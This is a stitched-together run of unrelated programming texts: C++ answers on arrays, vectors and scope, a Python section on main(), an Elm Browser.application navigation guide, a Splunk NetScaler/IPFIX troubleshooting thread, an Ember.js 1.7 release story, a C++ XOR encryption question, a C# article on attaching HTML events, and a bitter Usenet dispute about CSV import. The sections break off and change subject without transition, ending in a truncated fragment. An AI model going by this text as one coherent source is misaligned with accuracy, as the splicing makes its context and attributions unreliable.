new isn't always needed in C++, and definitely not here. new allocates dynamic memory for you if automatic allocation isn't good enough for you. You usually only use new if you want the variable to outlive its scope. Memory allocated with new must also always be deleted in order to avoid a memory leak. In modern C++, the use of new is even less needed because we have smart pointers.
bcLed ledArr[17];

This already creates 17 bcLeds for you (like how you would use new in C#, it requires no cleanup), so there is no need to use new on them. Just work with them. Your loop condition is wrong too; it's supposed to be < 17.
for (i = 0; i < 17; i++)
{
    ledArr[i].id = i;
    ledArr[i].charge = 0;
}
also why i am here is there a way to create an array of an unspecified length in C++ and then just append it with an new row each time I want to add an object to it?
Yes, that's what a std::vector is for:

#include <vector>

std::vector<bcLed> ledArr(17);

// loop over them:
for (std::size_t i = 0; i < ledArr.size(); ++i)
{
    // ledArr[i]
}

// or:
for (std::vector<bcLed>::iterator itr = ledArr.begin(); itr != ledArr.end(); ++itr)
{
    // *itr
}

// to insert at the back of the vector use push_back:
bcLed aLed;
ledArr.push_back(aLed);
If you have access to C++11 you can use a range-based loop instead and use emplace_back:

#include <vector>

std::vector<bcLed> ledArr(17);

// loop over them, just to iterate:
for (const auto& led : ledArr)
{
    // led.id
    // led.charge
}

// appending to the vector:
ledArr.emplace_back(/*constructor arguments*/);
To answer your comment
ok im going to brave and ask this when you say "if you want the variable to outlive it's scope or you're working with low level memory" I don't understand what any of that means... well mostly I don't understand what you mean by scope or low level memory. Could you explain those? is scope the time that the method runs for?
A scope of a variable is the context in which it is defined. Automatic storage lives until the end of its scope. Braces { } indicate scope. For example:

void foo()
{
    int x;
    bcLed aLed;

    { // create a new inner scope
        bcLed innerLed;
    } // scope ends, all automatic variables in it are destroyed (innerLed in this case)
    // can't use innerLed here.

    int new_int = x;
} // scope ends; new_int, x and aLed are destroyed.
Really though, a good book will tell you the differences and when they should be used.
4.42: Why Bother Having a main() Function?
if __name__ == '__main__':
    main()
It may seem pointless to have a main() function, since you could just put that code in the global scope at the bottom of the program instead, and the code would run exactly the same. However, there are two good reasons to put it inside a main() function.
First, this lets you have local variables, whereas otherwise the local variables in the main() function would have to become global variables. Limiting the number of global variables is a good way to keep the code simple and easier to debug. (See the "Why Global Variables are Evil" section in this chapter.)
Second, this also lets you import the program so that you can call and test individual functions. If the memorypuzzle.py file is in the C:\Python32 folder, then you can import it from the interactive shell. Type the following to test out the splitIntoGroupsOf() and getBoxAtPixel() functions to make sure they return the correct return values:
>>> import memorypuzzle
>>> memorypuzzle.splitIntoGroupsOf(3, [0,1,2,3,4,5,6,7,8,9])
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> memorypuzzle.getBoxAtPixel(0, 0)
(None, None)
>>> memorypuzzle.getBoxAtPixel(150, 150)
(1, 1)
When a module is imported, all of the code in it is run. If we didn't have the main() function, and had its code in the global scope, then the game would have automatically started as soon as we imported it, which really wouldn't let us call individual functions in it.
That's why the code is in a separate function that we have named main(). Then we check the built-in Python variable __name__ to see if we should call the main() function or not. This variable is automatically set by the Python interpreter to the string '__main__' if the program itself is being run, and 'memorypuzzle' if it is being imported. This is why the main() function is not run when we executed the import memorypuzzle statement in the interactive shell.
This is a handy technique for being able to import the program you are working on from the interactive shell and make sure individual functions are returning the correct values by testing them one call at a time.
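A minimal, self-contained sketch of the whole pattern (the module and function names here are illustrative, not taken from the game's source):

# mymodule.py -- a tiny module demonstrating the pattern
def add(a, b):
    # A small function we may want to test from the interactive shell.
    return a + b

def main():
    # Local variables stay local instead of becoming globals.
    total = add(2, 3)
    print('total is', total)

if __name__ == '__main__':
    main()  # runs only when executed directly, not on import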
Navigation
We just saw how to serve one page, but say we are making a website like package.elm-lang.org. It has a bunch of pages (e.g. search, README, docs) that all work differently. How does it do that?
Multiple Pages
The simple way would be to serve a bunch of different HTML files. Going to the home page? Load new HTML. Going to elm/core docs? Load new HTML. Going to elm/json docs? Load new HTML.
Until Elm 0.19, that is exactly what the package website did! It works. It is simple. But it has some weaknesses:
- Blank Screens. The screen goes white every time you load new HTML. Can we do a nice transition instead?
- Redundant Requests. Each package has a single docs.json file, but it gets loaded each time you visit a module like String or Maybe. Can we share the data between pages somehow?
- Redundant Code. The home page and the docs share a lot of functions, like Html.text and Html.div. Can this code be shared between pages?
We can improve all three cases! The basic idea is to only load HTML once, and then be a bit tricky to handle URL changes.
Single Page
Instead of creating our program with Browser.element or Browser.document, we can create a Browser.application to avoid loading new HTML when the URL changes:
application :
  { init : flags -> Url -> Key -> ( model, Cmd msg )
  , view : model -> Document msg
  , update : msg -> model -> ( model, Cmd msg )
  , subscriptions : model -> Sub msg
  , onUrlRequest : UrlRequest -> msg
  , onUrlChange : Url -> msg
  }
  -> Program flags model msg
It extends the functionality of Browser.document in three important scenarios.
When the application starts, init gets the current Url from the browser's navigation bar. This allows you to show different things depending on the Url.
When someone clicks a link, like <a href="/home">Home</a>, it is intercepted as a UrlRequest. So instead of loading new HTML with all the downsides, onUrlRequest creates a message for your update where you can decide exactly what to do next. You can save scroll position, persist data, change the URL yourself, etc.
When the URL changes, the new Url is sent to onUrlChange. The resulting message goes to update where you can decide how to show the new page.
So rather than loading new HTML, these three additions give you full control over URL changes. Let’s see it in action!
Example
We will start with the baseline Browser.application program. It just keeps track of the current URL. Skim through the code now! Pretty much all of the new and interesting stuff happens in the update function, and we will get into those details after the code:
import Browser
import Browser.Navigation as Nav
import Html exposing (..)
import Html.Attributes exposing (..)
import Url


-- MAIN

main : Program () Model Msg
main =
  Browser.application
    { init = init
    , view = view
    , update = update
    , subscriptions = subscriptions
    , onUrlChange = UrlChanged
    , onUrlRequest = LinkClicked
    }


-- MODEL

type alias Model =
  { key : Nav.Key
  , url : Url.Url
  }

init : () -> Url.Url -> Nav.Key -> ( Model, Cmd Msg )
init flags url key =
  ( Model key url, Cmd.none )


-- UPDATE

type Msg
  = LinkClicked Browser.UrlRequest
  | UrlChanged Url.Url

update : Msg -> Model -> ( Model, Cmd Msg )
update msg model =
  case msg of
    LinkClicked urlRequest ->
      case urlRequest of
        Browser.Internal url ->
          ( model, Nav.pushUrl model.key (Url.toString url) )

        Browser.External href ->
          ( model, Nav.load href )

    UrlChanged url ->
      ( { model | url = url }
      , Cmd.none
      )


-- SUBSCRIPTIONS

subscriptions : Model -> Sub Msg
subscriptions _ =
  Sub.none


-- VIEW

view : Model -> Browser.Document Msg
view model =
  { title = "URL Interceptor"
  , body =
      [ text "The current URL is: "
      , b [] [ text (Url.toString model.url) ]
      , ul []
          [ viewLink "/home"
          , viewLink "/profile"
          , viewLink "/reviews/the-century-of-the-self"
          , viewLink "/reviews/public-opinion"
          , viewLink "/reviews/shah-of-shahs"
          ]
      ]
  }

viewLink : String -> Html msg
viewLink path =
  li [] [ a [ href path ] [ text path ] ]
The update function can handle either LinkClicked or UrlChanged messages. There is a lot of new stuff in the LinkClicked branch, so we will focus on that first!
UrlRequest
Whenever someone clicks a link like <a href="/home">/home</a>, it produces a UrlRequest value:
type UrlRequest
  = Internal Url.Url
  | External String
The Internal variant is for any link that stays on the same domain. So if you are browsing https://example.com, internal links include things like settings#privacy, /home, https://example.com/home, and //example.com/home.
The External variant is for any link that goes to a different domain; any link pointing at another host counts. Notice that changing the protocol from https to http is considered a different domain!
Whichever link someone presses, our example program is going to create a LinkClicked message and send it to the update function. That is where we see most of the interesting new code!
LinkClicked
Most of our update logic is deciding what to do with these UrlRequest values:
update : Msg -> Model -> ( Model, Cmd Msg )
update msg model =
  case msg of
    LinkClicked urlRequest ->
      case urlRequest of
        Browser.Internal url ->
          ( model, Nav.pushUrl model.key (Url.toString url) )

        Browser.External href ->
          ( model, Nav.load href )

    UrlChanged url ->
      ( { model | url = url }
      , Cmd.none
      )
The particularly interesting functions are Nav.load and Nav.pushUrl. These are both from the Browser.Navigation module, which is all about changing the URL in different ways. We are using the two most common functions from that module:
- load loads all new HTML. It is equivalent to typing the URL into the URL bar and pressing enter. So whatever is happening in your Model will be thrown out, and a whole new page is loaded.
- pushUrl changes the URL, but does not load new HTML. Instead it triggers a UrlChanged message that we handle ourselves! It also adds an entry to the "browser history" so things work normally when people press the BACK or FORWARD buttons.
So looking back at the update function, we can understand how it all fits together a bit better now. When the user clicks an external link, we get an External message and use load to load new HTML from that server. But when the user clicks a /home link, we get an Internal message and use pushUrl to change the URL without loading new HTML!
Note 1: Both Internal and External links are producing commands immediately in our example, but that is not required! When someone clicks an External link, maybe you want to save textbox content to your database before navigating away. Or when someone clicks an Internal link, maybe you want to use getViewport to save the scroll position in case they navigate BACK later. That is all possible! It is a normal update function, and you can delay the navigation and do whatever you want.
Note 2: If you want to restore "what they were looking at" when they come BACK, scroll position is not perfect. If they resize their browser or reorient their device, it could be off by quite a lot! So it is probably better to save "what they were looking at" instead. Maybe that means using getViewportOf to figure out exactly what is on screen at the moment. The particulars depend on how your application works exactly, so I cannot give exact advice!
UrlChanged
There are a couple of ways to get UrlChanged messages. We just saw that pushUrl produces them, but pressing the browser BACK and FORWARD buttons produces them as well. And like I was saying in the notes a second ago, when you get a LinkClicked message, the pushUrl command may not be given immediately.
So the nice thing about having a separate UrlChanged message is that it does not matter how or when the URL changed. All you need to know is that it did!
We are just storing the new URL in our example here, but in a real web app, you need to parse the URL to figure out what content to show. That is what the next page is all about!
Note: I skipped talking about Nav.Key to try to focus on more important concepts. But I will explain here for those who are interested! A navigation Key is needed to create navigation commands (like pushUrl) that change the URL. You only get access to a Key when you create your program with Browser.application, guaranteeing that your program is equipped to detect these URL changes. If Key values were available in other kinds of programs, unsuspecting programmers would be sure to run into some annoying bugs and learn a bunch of techniques the hard way! As a result of all that, we have a line in our Model for our Key. A relatively low price to pay to help everyone avoid an extremely subtle category of problems!
We are running NetScaler 10.1 and I have installed version 5.0 of 'Splunk for Citrix NetScaler' and the 'Splunk Add-on for IPFIX', but so far I cannot see any information coming up in either the NetScaler Overview or AppFlow Overview areas. I am running Splunk on a Linux box. I can see that data is arriving from the NetScaler. I would welcome any tips or instructions on what extra steps I need to take with indexes or data inputs.
We are experimenting with the SplunkForNetscaler application.

It is important that you look at the Python scripts which come with the app in the /bin directory. These scripts define the source, sourcetype, and index which are expected. If you do NOT wish to have these preferences you will need to change the script.
/opt/splunk/etc/deployment-apps/SplunkforCitrixNetScaler/bin/scripted_inputs
def create_inputs(appdir, disabled):
    localdir = os.path.join(appdir, 'local')
    if not os.path.exists(localdir):
        os.makedirs(localdir)
    inputs_file = os.path.join(localdir, 'inputs.conf')
    fo = open(inputs_file, 'w')
    fo.write("[udp://8514]\n")
    fo.write("#connection_host = dns\n")
    fo.write("sourcetype = ns_log\n")
    fo.write("index = netscaler\n")
    fo.write("disabled = %d\n" % disabled)
(PS I wish splunk had better support for Markdown like Github)
Hello everyone,
I'm having a very similar issue although for a period of time my AppFlow Dahboards within the app were populating successfully but have since stopped.
I'm seeing a very similar message in my logs and was looking to see if any resolution ever came from this thread?
10-07-2014 13:44:17.092 -0400 ERROR ExecProcessor - message from "python /splunk/etc/apps/Splunk_TA_ipfix/bin/ipfix.py" CRITICAL:ipfix:Traceback (most recent call last): || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/script.py", line 74, in run_script || self.stream_events(self._input_definition, event_writer) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/IPFIX/ModInput.py", line 117, in stream_events || self.handle_message(data, address, stanza, writer) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/IPFIX/ModInput.py", line 77, in handle_message || source=":".join([str(v) for v in source]))) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/event_writer.py", line 104, in write_event || event.write_to(self._out) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/event.py", line 106, in write_to || stream.write(ET.tostring(event)) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 1126, in tostring || ElementTree(element).write(file, encoding, method=method) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 820, in write || serialize(write, self._root, encoding, qnames, namespaces) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 939, in _serialize_xml || _serialize_xml(write, e, encoding, qnames, None) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 937, in _serialize_xml || write(_escape_cdata(text, encoding)) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 1073, in _escape_cdata || return text.encode(encoding, "xmlcharrefreplace") || UnicodeDecodeError: 'utf8' codec can't decode byte 0xfa in position 206: invalid start byte
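For readers unfamiliar with this failure mode, here is a minimal Python sketch (our own illustration, not taken from the add-on) reproducing the class of error in the traceback: a raw byte such as 0xfa is not valid UTF-8, so passing un-decoded binary data into a text/XML path raises UnicodeDecodeError:

raw = b"payload \xfa with a non-UTF-8 byte"
try:
    raw.decode("utf8")
except UnicodeDecodeError as e:
    print(e)  # 'utf8' codec can't decode byte 0xfa ...

# One defensive approach (an assumption, not an official fix for the add-on)
# is to decode with replacement before the data reaches the XML writer:
safe = raw.decode("utf8", "replace")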
My inputs.conf for AppFlow is as follows:
[ipfix://NetScaler_AppFlow]
sourcetype = appflow
index = netscaler
address = 0.0.0.0
port = 4739
buffer = 1048576
disabled = false
Thank you in advance - I'm going to continue to troubleshoot this from my end.
Try this search and let me know what you see:
index=* *netscaler* | stats count by index
Thanks Jconger.
I did what you asked and the search came back empty. I believe data is coming from the netscaler as it was working prior to upgrading Splunk for Citrix Netscaler. I can see that data is arriving on the Splunk box and netscaler is the only device Splunk is monitoring at the moment.
Hi Jconger
I had a breakthrough earlier and now have Splunk for Netscaler working. I still cannot see any appflow data so I am now trying to sort that out.
Nice. What index is the NetScaler data in?
Hi Jbennett_splunk
Thanks for the reply. The NetScaler configuration should be OK, and it was working up until the point where I updated Splunk for Citrix NetScaler to the latest version. As far as I can tell the settings are exactly the same as in the example above. I am not sure what you mean by 'match where you are sending the data', so if you could elaborate that would be great.
If we are talking about the [ipfix://...] section of the inputs.conf file then I believe that is ok. I am a real newbie at this so I am unsure of how exactly one does a manual search.
To me it looks like Splunk is receiving data from the netscaler but not doing anything meaningful with it.
I am seeing the following error messages.
09-25-2014 16:12:23.590 +1000 ERROR SearchScheduler - Error in 'SearchOperator:copyresults': Cannot find results for search_id 'scheduler__nobody__SplunkforCitrixNetScaler__RMD5e6c1124fdfffb39d_at_1411625511_0'., search='copyresults dest="appid_lookup" sid="scheduler__nobody__SplunkforCitrixNetScaler__RMD5e6c1124fdfffb39d_at_1411625511_0"' 09-25-2014 16:11:57.614 +1000 ERROR ExecProcessor - message from "python /opt/splunk/etc/apps/Splunk_TA_ipfix/bin/ipfix.py" CRITICAL:ipfix:Traceback (most recent call last): || File "/opt/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/script.py", line 74, in run_script || self.stream_events(self._input_definition, event_writer) || File "/opt/splunk/etc/apps/Splunk_TA_ipfix/bin/IPFIX/ModInput.py", line 105, in stream_events || s.bind((bind_host, bind_port)) || File "/opt/splunk/lib/python2.7/socket.py", line 224, in meth || return getattr(self._sock,name)(*args) || error: [Errno 98] Address already in use
The first thing I would say is double-check that the address and port in your [ipfix://...] stanza are correct (0.0.0.0 means it's listening on all local IP addresses, which is usually fine), and match where you're sending the data.
Also, of course, make sure you're forwarding both syslog and netflow (aka IPFIX) from the Netscaler 😉
The second thing would be to double-check the index and sourcetype settings in your [ipfix://...] configuration, and do a manual search to see if there's any data in that index/sourcetype.
The app puts the data in index=netscaler, which is not searched by default, thus you need index=netscaler in your search.

As well, to collect the data you need to copy the Splunk_TA_Citrix-NetScaler folder from SplunkforCitrixNetScaler/appserver/addons/ to SPLUNK_HOME\etc\apps\ on your Splunk data collection instance, and put it on your search head too.
You might need to either modify your NetScaler config or the SPLUNK_HOME\etc\apps\Splunk_TA_Citrix-NetScaler\default\inputs.conf ports:
[udp://8514]
#connection_host = dns
sourcetype = ns_log
index = netscaler
disabled = true

# A separate IPFIX addon is needed in order for the following stanza to work.
[ipfix://NetScaler_AppFlow]
sourcetype = appflow
index = netscaler
address = 0.0.0.0
port = 4739
buffer = 1048576
disabled = true
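As a quick sanity check (our own suggestion, not from the thread), you can fire a test datagram at the UDP input from any machine with Python and then search the netscaler index for it:

import socket

# Hypothetical smoke test: send one syslog-style line to the UDP 8514 input.
# Replace 'splunk-host' with your indexer's address.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(b"<134>test message from smoke test", ("splunk-host", 8514))
sock.close()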
Hi Mario
Thanks for replying. I have the above in my SPLUNK_HOME\etc\apps\Splunk_TA_Citrix-NetScaler\default\inputs.conf file already but it has made no difference. Could I please ask you to explain a little more about the 'index=netscaler' portion of your answer? I am unsure where to perform this action. Apologies for being a Splunk newbie. 🙂
To see if you have data you need to check whether the index netscaler has been created in /manager/launcher/data/indexes, then search /app/search/search?q=search index%3Dnetscaler | head 1000 to see if there is data.
Hi Mario
As far as I can tell I do not have that directory. I am running Splunk on Ubuntu Linux. I have searched on the linux box for that directory but have found nothing.
Which directory do you mean? Do you have an index named netscaler?
Alex Navasardyan has announced the release of Ember.js 1.7 to the JavaScript community.
Navasardyan is an Ember.js release team member and described the release as bringing "bug fixes, potentially breaking changes and new features."
Among the new features in version 1.7 is support for query parameters. Giving thanks to Alex Matchneer and his core Ember.js team in the article "Ember 1.7.0 and 1.8 Beta Released", Navasardyan explains the feature, saying:
With this API, each query param is bound to a property on a controller, such that changes made to query params in the URL (e.g. user presses the back button) will update the controller property, and vice versa.
The API handles many of what Navasardyan describes as the "tricky aspects" of maintaining a binding to a URL.
These include correctly casting new URL query parameter values to the datatype expected by the controller property, omitting default query parameter values from the URL to avoid unnecessarily cluttering the URL with default values, and coalescing multiple controller property changes into one single URL update.
Other new features announced include nestable routes, removing the restriction that only this.resource can have nested child routes. With this change, Navasardyan says, this.route can be nested like this.resource, but unlike this.resource, the namespace of child routes is appended rather than reset to a top-level namespace.
In the Ember.js discussion forum, user Jinshui Tang commented on advance notice of the query params release, saying it had "resolved one of the most important issues with the pagination of part of my application."
Praise for query parameters also came from Ember users on Twitter. EmberSherpa responded to Alex Matchneer's release announcement saying "thank you so much for QP. It’s the most exciting thing to hit Ember stable since 1.0."
According to the Ember.js 1.7.0 changelog, the new release also brought a small number of breaking changes and deprecations, including, on controllers:
the content property is now derived from model. This reduces many caveats with model/content, and also sets a simple ground rule: Never set a controllers content, rather always set its model and Ember will do the right thing.
And for empty arrays:
An empty array is treated as falsy value in bind-attr to be in consistent with if helper. Breaking for apps that relies on the previous behaviour which treats an empty array as truthy value in bind-attr.
Among the listed bug fixes brought by the 1.7 Ember release were:
- Controllers with query params are unit testable.
- Controllers have new QP values before setupController.
- makeBoundHelper supports unquoted bound property options.
- SimpleHandlebarsView should not re-render if normalized value is unchanged.
- Allow Router DSL to nest routes via this.route.
with many more listed in the Ember.js 1.7.0 changelog here.
Already announced in the 1.8 Ember beta, the internal implementation of the view layer has been refactored, and usage of Ember on Internet Explorer 6 and 7 is deprecated, with support to be removed in the next major release.
Ember.js is released under an MIT licence. InfoQ readers can contribute to Ember.js via its GitHub project.
I am learning C++; below is an attempt at a simple XOR encryption program. I am using Dev-C++ (the Bloodshed IDE) with the MinGW Win32 GCC compiler.

This code compiles without errors or warnings but it will not produce an 'exe', only a '.o' file. Firstly, what is a '.o' file? Without much ado I am guessing it's a type of report produced when the program contains run-time errors. I am unable to access it though :o(

Secondly, does anyone know how this code could run, without having to make too many extreme changes to it?
Thanks S
#include <string>
#include <iostream>
#include <fstream>

using namespace std;

string textToEncrypt;
string outString;

int main(int argc, char* argv[])
{
    int key = 129;

    // argv[0] is the program's own name; the file to encrypt is argv[1]
    if (argc < 2)
    {
        cout << "usage: " << argv[0] << " <file>" << endl;
        return 1;
    }

    fstream infile1;
    infile1.open(argv[1], ios::in);          // open file

    while (infile1 >> textToEncrypt)         // read the file word by word
    {
        for (size_t x = 0; x < textToEncrypt.length(); x++)
        {
            char c = textToEncrypt[x];
            c = (char)(c ^ key);             // encrypt characters using v. simple XOR
            outString += c;
        }
    }
    infile1.close();

    ofstream outfile(argv[1]);               // reopen the file for writing (truncates)
    outfile << outString;                    // write encryption
    outfile.close();
    return 0;
}
I am not a native English speaker, and I am not heading for the Pulitzer Prize in journalism. So, if anyone finds this "article" a bit short, be patient. My purpose here is to provide the most useful information without too much talking. Besides, my C# English is fine enough for the VS2005 compiler :-). I hope the readers of this article will get their answer to the subject they Googled for: "Handling HTML events in .NET".
I was looking for a way to handle HTML events with the .NET EventHandler. While writing my Password Management Toolbar, I needed a way to hook to the "onsubmit" event of the HTML document form in order to check the login information.
Anyway, I looked for forums and threads that would give me a straight answer, but didn't find any. So, that left me no choice but to go to the last resort: the Reflector (Lutz Roeder's .NET Reflector).
What did I look for? When working with the WebBrowser control, you get the HtmlElement wrapper class that allows you to bind to mouse events pretty easily (like the HtmlElement.Click event). But I do not work with the WebBrowser control; I work with a BandObject (this is the toolbar object) or a Browser Helper Object (BHO), which only have access to the MSHTML DOM elements. Also, the managed wrapper does not provide an event for "onsubmit", so even the WebBrowser control wouldn't do for me. So, I started digging with the Reflector to see what the guys at Microsoft did to allow binding to mouse events. The main thing that I found was the HtmlToClrEventProxy class, which provided the correct interface for the object needed by the IHTMLElement2.attachEvent method. Anyway, this class is internal, so I took most of it, refined it, and made a similar public version of it that allows .NET users to easily attach to any HTMLElement event.
The best way is to download and try the sample first. There is only one class you need to add to your project: the HtmlEventProxy class. This class has a factory method Create() which will do all the binding. Then, when you want to detach from the event, simply call the Detach() method of the object. The "sender" object in the EventHandler is the proxy itself. In order to get the underlying HTMLElement, use the HtmlElement property. Here are a few of the code snippets from the sample:
Let's start from the .NET event handler of the onsubmit form event. It has the regular signature of the EventHandler. The code here also extracts the form element from the sender and shows its outerHTML string.
I chose to detach from the event once it is consumed, using the Detach() method.
private void FormSubmitHandler(object sender, EventArgs e)
{
    MessageBox.Show("form submitted");

    // show the outer html of the form
    IHTMLElement form = ((HtmlEventProxy)sender).HTMLElement as IHTMLElement;
    MessageBox.Show("outer html:" + form.outerHTML);

    // detach the event from the element
    ((HtmlEventProxy)sender).Detach();
}
Now, for the code that binds the form onsubmit event to the handler:
object form = webBrowser1.Document.Forms[0].DomElement;
HtmlEventProxy.Create("onsubmit", form, FormSubmitHandler);

object button = webBrowser1.Document.GetElementById("button1").DomElement;
HtmlEventProxy.Create("onclick", button, ButtonClickHandler);
First, obtain the element object from the document. Then, create a proxy with the name of the event, the DOM element, and the .NET handler.
The class implements the IReflect interface; that is the interface needed by IHTMLElement2.attachEvent(string ev, object pDisp). The most important part is the implementation of the IReflect.InvokeMember method. This method detects the call to the first method entry and executes the .NET handler.
I also implemented the IDisposable interface, so the event is detached when the proxy is disposed.
using System;
using System.Globalization;
using System.Reflection;
using mshtml;

public class HtmlEventProxy : IDisposable, IReflect
{
    // Fields
    private EventHandler eventHandler;
    private object sender;
    private IReflect typeIReflectImplementation;
    private IHTMLElement2 htmlElement = null;
    private string eventName = null;

    // private CTOR
    private HtmlEventProxy(string eventName,
                           IHTMLElement2 htmlElement,
                           EventHandler eventHandler)
    {
        this.eventName = eventName;
        this.htmlElement = htmlElement;
        this.sender = this;
        this.eventHandler = eventHandler;
        Type type = typeof(HtmlEventProxy);
        this.typeIReflectImplementation = type;
    }

    public static HtmlEventProxy Create(string eventName,
                                        object htmlElement,
                                        EventHandler eventHandler)
    {
        IHTMLElement2 elem = (IHTMLElement2)htmlElement;
        HtmlEventProxy newProxy = new HtmlEventProxy(eventName, elem, eventHandler);
        elem.attachEvent(eventName, newProxy);
        return newProxy;
    }

    /// detach only once (thread safe)
    public void Detach()
    {
        lock (this)
        {
            if (this.htmlElement != null)
            {
                IHTMLElement2 elem = (IHTMLElement2)htmlElement;
                elem.detachEvent(this.eventName, this);
                this.htmlElement = null;
            }
        }
    }

    /// HtmlElement property
    public IHTMLElement2 HTMLElement
    {
        get { return this.htmlElement; }
    }

    #region IReflect
    // ... other IReflect members (and IDisposable.Dispose) omitted ...
    object IReflect.InvokeMember(string name, BindingFlags invokeAttr,
        Binder binder, object target, object[] args,
        ParameterModifier[] modifiers, CultureInfo culture,
        string[] namedParameters)
    {
        // "[DISPID=0]" is the default dispatch entry the DOM invokes
        if (name == "[DISPID=0]")
        {
            if (this.eventHandler != null)
            {
                this.eventHandler(this.sender, EventArgs.Empty);
            }
        }
        return null;
    }
    #endregion
}
You can download the latest version of HtmlEventProxy.cs from here.
Enjoy!
Re: Basic Program to Import a CSV file
- From: "Tom deL" <ted@xxxxxxxxxxxxxx>
- Date: 8 Jun 2006 08:39:01 -0700
Hi Tony,
LOL. Now that you mention it, I'll admit it was silly for me to
assume that a CSV file came from Excel. But I think it's really funny
to imply that someone should buy a completely different database
product to import a text file into Universe.
Funnier than importing into a completely foreign system in order to
export through your filter of choice? Please note the resisted
temptation to reference the old "If the only tool with which one is
familiar is a hammer ..." cliche.
Given that the OP asked about importing a CSV file into UV, what would
it matter where the CSV file originated? And why would someone require
some Excel to MV tool to import a CSV file into UV? Looks like a case
of "my tool is the answer - what is the question?".
My suggestion was that if one were to bring an external application
into the equation, one which contains tools with which a MV person
would have facility might be more accessible (openQM vs. Excel as an
import filter).
- if you really want/need to use a spreadsheet application as a filter, OOCalc is more capable
Hey, why stop at replacing the database, replace the spreadsheet tools
too! Does that solve the CSV problem? No, but it sure sounds like a
plan!
And your Excel "solution" solved the CSV problem how? Why would you
assume that one would be replacing the spreadsheet tools? FYI, not
everyone owns a copy of Excel. Hammers, nails et al., I guess?
and infinitely less expensive
Seems a bit overly zealous, no? A standalone package of Excel 2003
can be purchased for about $170. That's hardly a large sum of money
for software that some companies run their businesses on (no advocacy
of that practice implied), and hardly an amount to be associated with
the terms "infinite" or "expensive".
Aside from "Divide by Zero Error" how would you describe the difference
between $US 170.00 and $US 0.00? And I didn't mention that OO.org comes
with all of the applications to handle .doc; .ppt and so on but that's
probably OT here.
but:
If your CSV file is RFC compliant or even if "all fields are wrapped in
quotes", openQM has the ability to directly parse your file into either
a hashed MV file or a directory file. The directory file may well be UV
compatible but if not you could easily do a T-DUMP and simply T-LOAD
into UV.
Sounds like a Rube Goldberg to me.
Using MV tools to do a job in MV is Rube Goldberg and installing (and
learning) foreign software isn't? The fact that you are so tied to
Excel, .NET and so on does not imply that the OP or any other MV user
would be.
An openQM license is vaguely equivalent to the cost of an Excel license
Did you forget the point you just made that Excel may not be involved?
I was attempting an apples to apples comparison: if we are going to use
a third party bit (sigh, see above).
and there is no need to import into Excel; export as another delimited
format or install anyone's adware and the required transport layer
license.
Hmmmm ... come to think of it, you could even replace UV with openQM
and then wouldn't require any of those third party bits and their
complication - might make more sense than a mediocre spreadsheet
application or "free" adware as filters.
-Tom
What the hell are you going on about?
- There are no ads in my freeware.
No they come whether one downloads it or not <g>
- The freeware I suggested to export worksheets to CSV does not have a
transport layer into MV, and neither does anything you suggested to
replace it.
- No one said anything about importing into Excel or exporting in any
other format.
As I mentioned above, you were the one who introduced Excel into this
thread - without Excel, what sense would your "freeware" make in the
context of the OP?
- You compare QM to my freeware as though they do the same thing. QM
has no Excel interface and doesn't write into other MV databases.
It does however have a proper CSV interface. And with a bit of
imagination one should be able to see that openQM can write to other
(modern at least) MV databases. For instance, I have no difficulty
using openQM's RFC compliant CSV parsing capabilities to write a
directory file that I can attach directly in D3 by simply creating a
Q-Pointer. AFAIK all modern MV environments contain this capability.
You're trying to make some kind of argument that X is better than Y
when the two concepts aren't even related.
No more related than your suggestion that your Excel export program is
somehow germane to an import CSV question?
- Haven't you lost some perspective about exactly what it is that
you're fighting for when someone already has data and a database and
you propose replacing everything they have just so they can do some
text manipulation?
Sorry about the redundancy and spoon-feeding but: See above. The
suggestion to replace the database was an afterthought. See below.
Tom, I don't understand why you feel a need to persist with innuendo
and flat out lies when you reply to my postings. This doesn't help
Tony, I have gone out of my way to honour your request to keep personal
shortcomings out of these discussions. You should at least stand ready
to reciprocate or be big enough to back up your projections with facts.
anyone here. Like anyone else here, I provide free info and some free
software. I do what I can toward the common good. When someone wants
something special that saves them time, improves their life, or allows
them to make more money, I offer to sell my solutions. There's
nothing evil about that but it seems you get bent when I offer to sell
These are your words. Is your inference of "evil" what you reference
above as innuendo? My post was simply meant to offer a solution that
could actually bear upon the OP's request.
solutions. Maybe some hatred for Microsoft drives your responses. I
really have no idea what your motivations are but I wish you'd get it
out in the open.
See immediately above. Does your love for M$ drive you to suggest
"solutions" that have no bearing on the problem posed in the OP?
What's really a shame is when week after week we see people hunting
for the same solutions, expecting to find them for free, solutions
that have been available (perhaps for years) for a very low and
reasonable cost. How much time=money is spent in the quest for all
things free? How much time=money would be saved if people just took a
look at some of the for-fee solutions that I offer whenever they ask
for help. How much money might some developer have earned in the last
year if only they would have adopted and sold a for-fee solution,
rather than waiting an entire year with no related income for some
free magic bullet? How do you help these people when you try to
undermine my efforts to provide solutions - even the free ones?
Below:
Here it is "out in the open" <g>:
People hunting for the same solutions is precisely the reason for my
afterthought suggestion of replacing the database tools.
In openQM, Ladybridge has provided a huge number of these solutions -
incorporated within the database and its tools, doing away with the
need for Rube Goldberg add-ons and the incessant re-inventing of the
wheel.
Most of these "things that should have been available years ago" are
often in and of themselves quite low-key: efficiently implemented in a
very PICK-like way so they sort of blend into the scenery. This is good
for those using the system.
From a marketing point of view this large, very efficient and useful
collection of tools has some difficulty competing with the bellicose
hype associated with some vendors here. My goal is to point out those
quiet features when they make sense.
TYM,
-Tom
Re: replace panels with fade effect
On 7/28/07, Leszek Gawron [EMAIL PROTECTED] wrote: I'd like to create an ajax heavy application (no pages, all panels). When replacing panels during ajax event I would like the old panel to fade out and new one to fade in (or any kind of morph effect). I've been trying to make use of
Re: general question on dynamic pages
